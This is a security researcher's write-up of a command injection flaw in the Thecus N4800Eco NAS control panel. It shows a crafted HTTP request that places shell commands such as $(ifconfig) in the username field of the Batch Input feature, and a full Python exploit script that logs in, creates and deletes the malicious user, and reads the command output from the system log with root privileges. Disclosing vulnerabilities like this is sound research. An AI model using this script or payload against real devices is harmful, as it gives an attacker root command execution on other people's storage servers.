# Thecus N4800Eco Nas Server Control Panel Comand Injection I have discovered command injection vulnerability on the Thecus N4800Eco Nas Server control panel during penetration test. I could not analyze source code because I didn't have enough time. Hence, I will describe only how vulnerability is detected. ### **# Description** Firstly, I have tried to add user through *Local User Configuration*, but server didn't accept special chars such as `$)(` . Also, user and group could be created using *Batch Input* option that is under the *User and Group Authentication* section. I set Batch Content as `$(ifconfig),22222,9999` that corresponds to username, password and group name. {% code title="Request:" %} ``` POST /adm/setmain.php?fun=setbatch HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 42 Origin: https://target Connection: close Referer: https://target/adm/index.php Cookie: select_md=0; MYSESSID=* batch_content=%24(ifconfig)%2C22222%2C9999 ``` {% endcode %} ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6ExqB7i_tEhJSUb6%2F1-1.PNG?alt=media\&token=2a504bc4-0c3e-4352-a8f0-bc69741654b0) ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6cPXl4ApU36QUf3W%2F2-2.PNG?alt=media\&token=5ee3753e-0d0e-4e7d-84fc-3b679616d24b) So that filtering can be bypassed using *Batch Content* option for adding malicious payload as username. After the user adding process, I sent second request for deleting `$(ifconfig)` user and *Local User remove succeeds* response is returned. However the user was not deleted, it is very interesting to me. I tried to understand what happened and noticed that there is a *system log* section. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiFTbORc7O-jDgi_PM%2F3-1.PNG?alt=media\&token=2f3e57f1-e825-452a-80d3-9d3cf8d2a852) ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiGvM6NURXxuYReF2W%2F4-1.png?alt=media\&token=222139eb-b074-45b6-9b58-f9bcf8cca54c) Surprisingly I saw that `ifconfig` command is executed. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiKlhFI5r2BBauo8Go%2F-MaiLoSVnY0LBioSVVJC%2F8-1.PNG?alt=media\&token=e45ac954-9dcd-4c87-a071-785113cc43ee) For verifying the command injection vulnerability i tried another command such as `id` ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiMIoYzcA_EJNt2Fnn%2F-MaiNAKfe6a8EUpfgRX6%2F8-2.PNG?alt=media\&token=4afb5c26-b002-4b35-995b-2984875991d2) ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiT-6iAD4WGkIDmhHI%2F-MaiUecBtiNYXyX05abI%2F8-3.PNG?alt=media\&token=06b0c494-0bc4-4ec6-b7d3-f124f7daaea3) So there is a comman injection vulnerability that lets to execute command with `root` privilege. `Username` parameter seems to vulnerable. It is time to write basic Python script. ```python import requests import sys import urllib3 # To fix SSL error that occurs when script is started. # 1- Open /etc/ssl/openssl.cnf file # At the bottom of the file: # [system_default_sect] # MinProtocol = TLSv1.2 # CipherString = DEFAULT@SECLEVEL=2 # 2- Set value of MinProtocol as TLSv1.0 def readResult(s, target): d = { "fun": "setlog", "action": "query", "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]' } url = "https://" + target + "/adm/setmain.php" resultReq = s.post(url, data=d, verify=False) dict = resultReq.text.split() print("[+] Reading system log...\n") #Set your command output range print(dict[5:8]) def delUser(s, target, command): d = { "action": "delete", "username": "$("+command+")" } url = "https://" + target + "/adm/setmain.php?fun=setlocaluser" delUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Local User remove succeeds' in delUserReq.text: print('[+] %s command was executed successfully' % command) else: print('[-] %s command was not executed!' %command) sys.exit(1) readResult(s, target) def addUser(s, target, command): d = {'batch_content': '%24('+command+')%2C22222%2C9999'} url = "https://" + target + "/adm/setmain.php?fun=setbatch" addUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Users and groups were created successfully.' in addUserReq.text: print('[+] Users and groups were created successfully') else: print('[-] Users and groups were not created') sys.exit(1) delUser(s, target, command) def login(target, username, password, command=None): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() d = { "&eplang": "english", "p_pass": password, "p_user": username, "username": username, "pwd": password, "action": "login", "option": "com_extplorer" } url = "https://" + target + "/adm/login.php" loginReq = s.post(url, data=d, allow_redirects=False, verify=False) if '"success":true' in loginReq.text: print('[+] Authentication successful') elif '"success":false' in loginReq.text: print('[-] Authentication failed!') sys.exit(1) else: print('[-] Something went wrong!') sys.exit(1) addUser(s, target, command) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password command" % (args[0])) print("Example 192.168.1.13:80 admin admin id") sys.exit(1) login(target=args[1], username=args[2], password=args[3], command=args[4]) if __name__ == "__main__": main(args=sys.argv) ``` {% embed url="" %} 
# Author: Metin Yunus Kandemir